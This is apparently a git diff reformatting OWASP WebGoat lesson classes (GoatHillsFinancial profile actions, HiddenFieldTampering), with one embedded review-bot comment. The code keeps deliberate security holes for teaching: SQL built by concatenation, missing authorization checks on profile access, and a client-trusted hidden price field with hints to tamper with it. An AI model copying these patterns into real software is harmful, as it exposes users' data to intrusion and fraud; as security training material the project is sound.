LessonAction chainedAction) { - chainedAction.handleRequest(s); - } - catch (UnauthenticatedException ue1) - { - System.out.println("Internal server error"); - ue1.printStackTrace(); - } - catch (UnauthorizedException ue2) - { - System.out.println("Internal server error"); - ue2.printStackTrace(); + super(lesson, lessonName, actionName); + this.chainedAction = chainedAction; } - } + public void handleRequest(WebSession s) throws ParameterNotFoundException, ValidationException + { + // System.out.println("Logging out"); + setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.FALSE); - public String getNextPage(WebSession s) - { - return chainedAction.getNextPage(s); - } + // FIXME: Maybe we should forward to Login. 
+ try
+ {
+ chainedAction.handleRequest(s);
+ } catch (UnauthenticatedException ue1)
+ {
+ System.out.println("Internal server error");
+ ue1.printStackTrace();
+ } catch (UnauthorizedException ue2)
+ {
+ System.out.println("Internal server error");
+ ue2.printStackTrace();
+ }
+
+ }
+
+ public String getNextPage(WebSession s)
+ {
+ return chainedAction.getNextPage(s);
+ }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/SearchStaff.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/SearchStaff.java
index 7113b4c76..7e3001566 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/SearchStaff.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/SearchStaff.java
@@ -1,49 +1,47 @@
+
 package org.owasp.webgoat.lessons.GoatHillsFinancial;
 import org.owasp.webgoat.session.WebSession;
-/*******************************************************************************
+
+/***************************************************************************************************
 *
 *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
 *
 * Copyright (c) 2002 - 2007 Bruce Mayhew
 *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
 *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
 *
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
 *
 * Getting Source ==============
 *
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
 *
 * For details, please see http://code.google.com/p/webgoat/
 */
 public class SearchStaff extends DefaultLessonAction
 {
- public SearchStaff(GoatHillsFinancial lesson, String lessonName,
- String actionName)
- {
- super(lesson, lessonName, actionName);
- }
+ public SearchStaff(GoatHillsFinancial lesson, String lessonName, String actionName)
+ {
+ super(lesson, lessonName, actionName);
+ }
-
- public String getNextPage(WebSession s)
- {
- return GoatHillsFinancial.SEARCHSTAFF_ACTION;
- }
+ public String getNextPage(WebSession s)
+ {
+ return GoatHillsFinancial.SEARCHSTAFF_ACTION;
+ }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java
index 487ef3180..c4f0e3bbf 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java
@@ -1,10 +1,10 @@
+
 package org.owasp.webgoat.lessons.GoatHillsFinancial;
 import java.sql.PreparedStatement;
 import java.sql.ResultSet;
 import java.sql.SQLException;
 import java.sql.Statement;
-
 import org.owasp.webgoat.session.Employee;
 import org.owasp.webgoat.session.ParameterNotFoundException;
 import org.owasp.webgoat.session.UnauthenticatedException;
@@ -12,236 +12,205 @@ import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.ValidationException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class UpdateProfile extends DefaultLessonAction { - private LessonAction chainedAction; + private LessonAction chainedAction; - public UpdateProfile(GoatHillsFinancial lesson, String lessonName, - String actionName, LessonAction chainedAction) - { - super(lesson, lessonName, actionName); - this.chainedAction = chainedAction; - } - - public void handleRequest(WebSession s) throws ParameterNotFoundException, - UnauthenticatedException, UnauthorizedException, - ValidationException - { - if (isAuthenticated(s)) + public UpdateProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction) { - int userId = getIntSessionAttribute(s, getLessonName() + "." 
- + GoatHillsFinancial.USER_ID); - - int subjectId = s.getParser().getIntParameter( - GoatHillsFinancial.EMPLOYEE_ID, 0); - - String firstName = s.getParser().getStringParameter( - GoatHillsFinancial.FIRST_NAME); - String lastName = s.getParser().getStringParameter( - GoatHillsFinancial.LAST_NAME); - String ssn = s.getParser().getStringParameter( - GoatHillsFinancial.SSN); - String title = s.getParser().getStringParameter( - GoatHillsFinancial.TITLE); - String phone = s.getParser().getStringParameter( - GoatHillsFinancial.PHONE_NUMBER); - String address1 = s.getParser().getStringParameter( - GoatHillsFinancial.ADDRESS1); - String address2 = s.getParser().getStringParameter( - GoatHillsFinancial.ADDRESS2); - int manager = s.getParser().getIntParameter( - GoatHillsFinancial.MANAGER); - String startDate = s.getParser().getStringParameter( - GoatHillsFinancial.START_DATE); - int salary = s.getParser().getIntParameter( - GoatHillsFinancial.SALARY); - String ccn = s.getParser().getStringParameter( - GoatHillsFinancial.CCN); - int ccnLimit = s.getParser().getIntParameter( - GoatHillsFinancial.CCN_LIMIT); - String disciplinaryActionDate = s.getParser().getStringParameter( - GoatHillsFinancial.DISCIPLINARY_DATE); - String disciplinaryActionNotes = s.getParser().getStringParameter( - GoatHillsFinancial.DISCIPLINARY_NOTES); - String personalDescription = s.getParser().getStringParameter( - GoatHillsFinancial.DESCRIPTION); - - Employee employee = new Employee(subjectId, firstName, lastName, - ssn, title, phone, address1, address2, manager, startDate, - salary, ccn, ccnLimit, disciplinaryActionDate, - disciplinaryActionNotes, personalDescription); - - if (subjectId > 0) - { - this.changeEmployeeProfile(s, userId, subjectId, employee); - setRequestAttribute(s, getLessonName() + "." 
- + GoatHillsFinancial.EMPLOYEE_ID, Integer - .toString(subjectId)); - } - else - this.createEmployeeProfile(s, userId, employee); - - try - { - chainedAction.handleRequest(s); - } - catch (UnauthenticatedException ue1) - { - System.out.println("Internal server error"); - ue1.printStackTrace(); - } - catch (UnauthorizedException ue2) - { - System.out.println("Internal server error"); - ue2.printStackTrace(); - } + super(lesson, lessonName, actionName); + this.chainedAction = chainedAction; } - else - throw new UnauthenticatedException(); - } - public String getNextPage(WebSession s) - { - return GoatHillsFinancial.VIEWPROFILE_ACTION; - } - - public void changeEmployeeProfile(WebSession s, int userId, int subjectId, - Employee employee) throws UnauthorizedException - { - try + public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, + UnauthorizedException, ValidationException { - // Note: The password field is ONLY set by ChangePassword - String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?," - + " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?," - + " personal_description = ? WHERE userid = ?;"; - try - { - PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + if (isAuthenticated(s)) + { + int userId = getIntSessionAttribute(s, getLessonName() + "." 
+ GoatHillsFinancial.USER_ID); - ps.setString(1, employee.getFirstName()); - ps.setString(2, employee.getLastName()); - ps.setString(3, employee.getSsn()); - ps.setString(4, employee.getTitle()); - ps.setString(5, employee.getPhoneNumber()); - ps.setString(6, employee.getAddress1()); - ps.setString(7, employee.getAddress2()); - ps.setInt(8, employee.getManager()); - ps.setString(9, employee.getStartDate()); - ps.setString(10, employee.getCcn()); - ps.setInt(11, employee.getCcnLimit()); - ps.setString(12, employee.getPersonalDescription()); - ps.setInt(13, subjectId); - ps.execute(); - } - catch (SQLException sqle) - { - s.setMessage("Error updating employee profile"); - sqle.printStackTrace(); - } + int subjectId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID, 0); + String firstName = s.getParser().getStringParameter(GoatHillsFinancial.FIRST_NAME); + String lastName = s.getParser().getStringParameter(GoatHillsFinancial.LAST_NAME); + String ssn = s.getParser().getStringParameter(GoatHillsFinancial.SSN); + String title = s.getParser().getStringParameter(GoatHillsFinancial.TITLE); + String phone = s.getParser().getStringParameter(GoatHillsFinancial.PHONE_NUMBER); + String address1 = s.getParser().getStringParameter(GoatHillsFinancial.ADDRESS1); + String address2 = s.getParser().getStringParameter(GoatHillsFinancial.ADDRESS2); + int manager = s.getParser().getIntParameter(GoatHillsFinancial.MANAGER); + String startDate = s.getParser().getStringParameter(GoatHillsFinancial.START_DATE); + int salary = s.getParser().getIntParameter(GoatHillsFinancial.SALARY); + String ccn = s.getParser().getStringParameter(GoatHillsFinancial.CCN); + int ccnLimit = s.getParser().getIntParameter(GoatHillsFinancial.CCN_LIMIT); + String disciplinaryActionDate = s.getParser().getStringParameter(GoatHillsFinancial.DISCIPLINARY_DATE); + String disciplinaryActionNotes = s.getParser().getStringParameter(GoatHillsFinancial.DISCIPLINARY_NOTES); + String personalDescription = 
s.getParser().getStringParameter(GoatHillsFinancial.DESCRIPTION); + + Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2, + manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes, + personalDescription); + + if (subjectId > 0) + { + this.changeEmployeeProfile(s, userId, subjectId, employee); + setRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID, Integer + .toString(subjectId)); + } + else + this.createEmployeeProfile(s, userId, employee); + + try + { + chainedAction.handleRequest(s); + } catch (UnauthenticatedException ue1) + { + System.out.println("Internal server error"); + ue1.printStackTrace(); + } catch (UnauthorizedException ue2) + { + System.out.println("Internal server error"); + ue2.printStackTrace(); + } + } + else + throw new UnauthenticatedException(); } - catch (Exception e) - { - s.setMessage("Error updating employee profile"); - e.printStackTrace(); - } - } - private int getNextUID(WebSession s) - { - int uid = -1; - try + public String getNextPage(WebSession s) { - Statement statement = WebSession.getConnection(s).createStatement( - ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet results = statement - .executeQuery("select max(userid) as uid from employee"); - results.first(); - uid = results.getInt("uid"); + return GoatHillsFinancial.VIEWPROFILE_ACTION; } - catch (SQLException sqle) - { - sqle.printStackTrace(); - s.setMessage("Error updating employee profile"); - } - catch (ClassNotFoundException e) - { - // TODO Auto-generated catch block - e.printStackTrace(); - } - return uid + 1; - } - public void createEmployeeProfile(WebSession s, int userId, - Employee employee) throws UnauthorizedException - { - try + public void changeEmployeeProfile(WebSession s, int userId, int subjectId, Employee employee) + throws UnauthorizedException { + try + { + // Note: The password field is ONLY set by ChangePassword + 
String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?," + + " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?," + + " personal_description = ? WHERE userid = ?;"; + try + { + PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, + ResultSet.TYPE_SCROLL_INSENSITIVE, + ResultSet.CONCUR_READ_ONLY); + + ps.setString(1, employee.getFirstName()); + ps.setString(2, employee.getLastName()); + ps.setString(3, employee.getSsn()); + ps.setString(4, employee.getTitle()); + ps.setString(5, employee.getPhoneNumber()); + ps.setString(6, employee.getAddress1()); + ps.setString(7, employee.getAddress2()); + ps.setInt(8, employee.getManager()); + ps.setString(9, employee.getStartDate()); + ps.setString(10, employee.getCcn()); + ps.setInt(11, employee.getCcnLimit()); + ps.setString(12, employee.getPersonalDescription()); + ps.setInt(13, subjectId); + ps.execute(); + } catch (SQLException sqle) + { + s.setMessage("Error updating employee profile"); + sqle.printStackTrace(); + } + + } catch (Exception e) + { + s.setMessage("Error updating employee profile"); + e.printStackTrace(); + } + } + + private int getNextUID(WebSession s) + { + int uid = -1; + try + { + Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, + ResultSet.CONCUR_READ_ONLY); + ResultSet results = statement.executeQuery("select max(userid) as uid from employee"); + results.first(); + uid = results.getInt("uid"); + } catch (SQLException sqle) + { + sqle.printStackTrace(); + s.setMessage("Error updating employee profile"); + } catch (ClassNotFoundException e) + { + // TODO Auto-generated catch block + e.printStackTrace(); + } + return uid + 1; + } + + public void createEmployeeProfile(WebSession s, int userId, Employee employee) throws UnauthorizedException + { + try + { int nextId = getNextUID(s); - String query = "INSERT INTO employee VALUES ( " + nextId + ", 
?,?,?,?,?,?,?,?,?,?,?,?,?,?)"; + String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)"; - try - { - PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query); + try + { + PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query); - ps.setString(1, employee.getFirstName().toLowerCase()); - ps.setString(2, employee.getLastName()); - ps.setString(3, employee.getSsn()); - ps.setString(4, employee.getTitle()); - ps.setString(5, employee.getPhoneNumber()); - ps.setString(6, employee.getAddress1()); - ps.setString(7, employee.getAddress2()); - ps.setInt(8, employee.getManager()); - ps.setString(9, employee.getStartDate()); - ps.setString(10, employee.getCcn()); - ps.setInt(11, employee.getCcnLimit()); - ps.setString(12, employee.getDisciplinaryActionDate()); - ps.setString(13, employee.getDisciplinaryActionNotes()); - ps.setString(14, employee.getPersonalDescription()); + ps.setString(1, employee.getFirstName().toLowerCase()); + ps.setString(2, employee.getLastName()); + ps.setString(3, employee.getSsn()); + ps.setString(4, employee.getTitle()); + ps.setString(5, employee.getPhoneNumber()); + ps.setString(6, employee.getAddress1()); + ps.setString(7, employee.getAddress2()); + ps.setInt(8, employee.getManager()); + ps.setString(9, employee.getStartDate()); + ps.setString(10, employee.getCcn()); + ps.setInt(11, employee.getCcnLimit()); + ps.setString(12, employee.getDisciplinaryActionDate()); + ps.setString(13, employee.getDisciplinaryActionNotes()); + ps.setString(14, employee.getPersonalDescription()); - ps.execute(); - } - catch (SQLException sqle) - { - s.setMessage("Error updating employee profile"); - sqle.printStackTrace(); - } + ps.execute(); + } catch (SQLException sqle) + { + s.setMessage("Error updating employee profile"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error updating employee profile"); + e.printStackTrace(); + } } - catch (Exception e) - { - 
s.setMessage("Error updating employee profile");
- e.printStackTrace();
- }
- }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java
index baae6aa7a..9a79405db 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java
@@ -1,146 +1,124 @@
+
 package org.owasp.webgoat.lessons.GoatHillsFinancial;
 import java.sql.ResultSet;
 import java.sql.SQLException;
 import java.sql.Statement;
-
 import org.owasp.webgoat.session.Employee;
 import org.owasp.webgoat.session.ParameterNotFoundException;
 import org.owasp.webgoat.session.UnauthenticatedException;
 import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.WebSession;
-/*******************************************************************************
+
+/***************************************************************************************************
 *
 *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
 *
 * Copyright (c) 2002 - 2007 Bruce Mayhew
 *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
 *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
* - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. + * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class ViewProfile extends DefaultLessonAction { - public ViewProfile(GoatHillsFinancial lesson, String lessonName, - String actionName) - { - super(lesson, lessonName, actionName); - } - - - public void handleRequest(WebSession s) throws ParameterNotFoundException, - UnauthenticatedException, UnauthorizedException - { - getLesson().setCurrentAction(s, getActionName()); - - if (isAuthenticated(s)) + public ViewProfile(GoatHillsFinancial lesson, String lessonName, String actionName) { - int userId = getIntSessionAttribute(s, getLessonName() + "." - + GoatHillsFinancial.USER_ID); - int employeeId = -1; - try - { - // User selected employee - employeeId = s.getParser().getIntParameter( - GoatHillsFinancial.EMPLOYEE_ID); - } - catch (ParameterNotFoundException e) - { - // May be an internally selected employee - employeeId = getIntRequestAttribute(s, getLessonName() + "." - + GoatHillsFinancial.EMPLOYEE_ID); - } - - Employee employee = getEmployeeProfile(s, userId, employeeId); - setSessionAttribute(s, getLessonName() + "." 
- + GoatHillsFinancial.EMPLOYEE_ATTRIBUTE_KEY, employee); + super(lesson, lessonName, actionName); } - else - throw new UnauthenticatedException(); - } - - public String getNextPage(WebSession s) - { - return GoatHillsFinancial.VIEWPROFILE_ACTION; - } - - - protected Employee getEmployeeProfile(WebSession s, int userId, - int subjectUserId) throws UnauthorizedException - { - Employee profile = null; - - // Query the database for the profile data of the given employee - try + public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, + UnauthorizedException { - String query = "SELECT * FROM employee WHERE userid = " - + subjectUserId; + getLesson().setCurrentAction(s, getActionName()); - try - { - Statement answer_statement = WebSession.getConnection(s) - .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(query); - if (answer_results.next()) + if (isAuthenticated(s)) { - // Note: Do NOT get the password field. 
- profile = new Employee(answer_results.getInt("userid"), - answer_results.getString("first_name"), - answer_results.getString("last_name"), - answer_results.getString("ssn"), answer_results - .getString("title"), answer_results - .getString("phone"), answer_results - .getString("address1"), answer_results - .getString("address2"), answer_results - .getInt("manager"), answer_results - .getString("start_date"), answer_results - .getInt("salary"), answer_results - .getString("ccn"), answer_results - .getInt("ccn_limit"), answer_results - .getString("disciplined_date"), - answer_results.getString("disciplined_notes"), - answer_results.getString("personal_description")); - /* System.out.println("Retrieved employee from db: " + - profile.getFirstName() + " " + profile.getLastName() + - " (" + profile.getId() + ")"); - */} - } - catch (SQLException sqle) - { - s.setMessage("Error getting employee profile"); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error getting employee profile"); - e.printStackTrace(); + int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID); + int employeeId = -1; + try + { + // User selected employee + employeeId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID); + } catch (ParameterNotFoundException e) + { + // May be an internally selected employee + employeeId = getIntRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID); + } + + Employee employee = getEmployeeProfile(s, userId, employeeId); + setSessionAttribute(s, getLessonName() + "." 
+ GoatHillsFinancial.EMPLOYEE_ATTRIBUTE_KEY, employee); + } + else + throw new UnauthenticatedException(); + } - return profile; - } + public String getNextPage(WebSession s) + { + return GoatHillsFinancial.VIEWPROFILE_ACTION; + } + + protected Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException + { + Employee profile = null; + + // Query the database for the profile data of the given employee + try + { + String query = "SELECT * FROM employee WHERE userid = " + subjectUserId; + + try + { + Statement answer_statement = WebSession.getConnection(s) + .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + ResultSet answer_results = answer_statement.executeQuery(query); + if (answer_results.next()) + { + // Note: Do NOT get the password field. + profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"), + answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results + .getString("title"), answer_results.getString("phone"), answer_results + .getString("address1"), answer_results.getString("address2"), answer_results + .getInt("manager"), answer_results.getString("start_date"), answer_results + .getInt("salary"), answer_results.getString("ccn"), answer_results + .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results + .getString("disciplined_notes"), answer_results.getString("personal_description")); + /* + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + + * profile.getLastName() + " (" + profile.getId() + ")"); + */} + } catch (SQLException sqle) + { + s.setMessage("Error getting employee profile"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error getting employee profile"); + e.printStackTrace(); + } + + return profile; + } } 
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java b/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java
index 8d11272b3..e300434d9 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java
@@ -1,9 +1,9 @@
+
 package org.owasp.webgoat.lessons;
 import java.util.ArrayList;
 import java.util.List;
 import java.util.regex.Pattern;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -22,46 +22,44 @@ import org.apache.ecs.html.Table; import org.owasp.webgoat.session.ECSFactory; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ * * @author Jeff Williams Aspect Security * @author Bruce Mayhew WebGoat * @created October 28, 2003 -*/ + */ public class HiddenFieldTampering extends LessonAdapter { - public final static A ASPECT_LOGO = - new A().setHref("http://www.aspectsecurity.com").addElement( - new IMG("images/logos/aspect.jpg") - .setAlt("Aspect Security").setBorder(0) - .setHspace(0).setVspace(0)); + public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") + .addElement( + new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) + .setVspace(0)); private final static String PRICE = "Price"; @@ -69,14 +67,14 @@ public class HiddenFieldTampering extends LessonAdapter private final static String PRICE_TV_HACKED = "9.99"; - String regex = "^" + PRICE_TV + "$"; // obviously the "." will match any char - any interesting exploit! + String regex = "^" + PRICE_TV + "$"; // obviously the "." will match any char - any + // interesting exploit! Pattern pattern1 = Pattern.compile(regex); String lineSep = System.getProperty("line.separator"); - String script = - "" + lineSep; + String script = "" + lineSep; /** * Constructor for the HiddenFieldScreen object 
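Review bot: The trailing comment on the `regex` field is now wrapped mid-phrase (`// obviously the "." will match any char - any` / `// interesting exploit!`), so the second line reads as an unrelated remark; put the comment on its own line above the declaration instead of letting the formatter break it. While touching it, say whether the unescaped `.` in `"^" + PRICE_TV + "$"` is deliberate lesson behaviour: if `pattern1` is meant to check an exact price, `Pattern.compile("^" + Pattern.quote(PRICE_TV) + "$")` does that, otherwise a comment such as `// intentionally unescaped: the lesson relies on "." matching any character` records the decision. The value of `PRICE_TV` and the use of `pattern1` are outside this hunk, so I cannot tell which is intended.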
@@ -104,8 +102,7 @@ public class HiddenFieldTampering extends LessonAdapter price = s.getParser().getRawParameter(PRICE, PRICE_TV); quantity = s.getParser().getFloatParameter("QTY", 1.0f); total = quantity * Float.parseFloat(price); - } - catch (Exception e) + } catch (Exception e) { s.setMessage("Invaild data " + this.getClass().getName()); price = PRICE_TV; @@ -162,7 +159,8 @@ public class HiddenFieldTampering extends LessonAdapter ec.addElement(input); ec.addElement(new BR()); - } else + } + else { if (!price.toString().equals(PRICE_TV)) { @@ -200,7 +198,7 @@ public class HiddenFieldTampering extends LessonAdapter hints.add("Use a program to intercept and change the value in the hidden field."); hints .add("Use WebScarab to change the price of the TV from " - + PRICE_TV + " to " + PRICE_TV_HACKED + "."); + + PRICE_TV + " to " + PRICE_TV_HACKED + "."); return hints; } @@ -212,8 +210,7 @@ public class HiddenFieldTampering extends LessonAdapter */ public String getInstructions(WebSession s) { - String instructions = - "Try to purchase the HDTV for less than the purchase price, if you have not done so already."; + String instructions = "Try to purchase the HDTV for less than the purchase price, if you have not done so already."; return (instructions); } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/HtmlClues.java b/main/project/JavaSource/org/owasp/webgoat/lessons/HtmlClues.java index a18af7a8f..c41d374e4 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/HtmlClues.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/HtmlClues.java @@ -1,8 +1,8 @@ + package org.owasp.webgoat.lessons; import java.util.ArrayList; import java.util.List; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; 
@@ -17,244 +17,234 @@ import org.apache.ecs.html.TD; import org.apache.ecs.html.TH; import org.apache.ecs.html.TR; import org.apache.ecs.html.Table; - import org.owasp.webgoat.session.ECSFactory; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it 